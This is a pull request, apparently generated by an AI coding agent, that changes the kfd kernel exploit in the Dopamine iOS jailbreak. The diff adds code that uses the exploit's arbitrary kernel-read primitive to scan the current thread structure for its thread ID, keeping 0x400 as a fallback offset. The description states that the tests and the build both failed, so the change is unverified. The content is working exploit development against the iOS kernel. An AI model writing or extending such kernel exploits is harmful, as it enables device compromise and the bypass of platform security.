### PR TITLE
Resolve thread_id offset dynamically

### DIFF
--- a/Dopamine/Exploits/kfd/kfd.m
+++ b/Dopamine/Exploits/kfd/kfd.m
@@ -195,7 +195,7 @@ int exploit_init(const char *flavor)
         .IOSurface__indexedTimestampPtr = 0x360,
         .IOSurface__readDisplacement    =  0x14,
 
-        .thread__thread_id = 0x400, // TODO: Universalize (Only relevant for kread_kqueue_workloop_ctl)
+        .thread__thread_id = 0x0, // Resolved dynamically (Only relevant for kread_kqueue_workloop_ctl)
 
         .kernelcache__allproc          = ksymbol(allproc),
         
@@ -278,6 +278,20 @@ int exploit_init(const char *flavor)
     gKfd = kopen(puaf_pages, method, kread_method, kwrite_method);
     gPrimitives.kreadbuf = kreadbuf;
     gPrimitives.kwritebuf = kwritebuf;
+
+    // Resolve thread->thread_id offset dynamically using current thread info
+    struct kfd *kfd_ctx = (struct kfd *)gKfd;
+    uint64_t self_thread = kfd_ctx->info.kaddr.current_thread;
+    uint64_t self_tid = kfd_ctx->info.env.tid;
+    for (uint64_t off = 0; off < 0x800; off += sizeof(uint64_t)) {
+        if (kread64(self_thread + off) == self_tid) {
+            dynamic_system_info.thread__thread_id = off;
+            break;
+        }
+    }
+    if (dynamic_system_info.thread__thread_id == 0) {
+        dynamic_system_info.thread__thread_id = 0x400; // Fallback
+    }
 
     if (hogged != NULL) {
         free(hogged);


### PR DESCRIPTION
## Summary
- compute `thread_id` offset from current thread at runtime
- fall back to legacy `0x400` if automatic detection fails

## Testing
- `make test` (fails: No target rule for test)
- `make` (fails: Permission denied running ./BaseBin/pack.sh)


------
https://chatgpt.com/codex/tasks/task_e_689da11d9634832d982bf3c442ba8113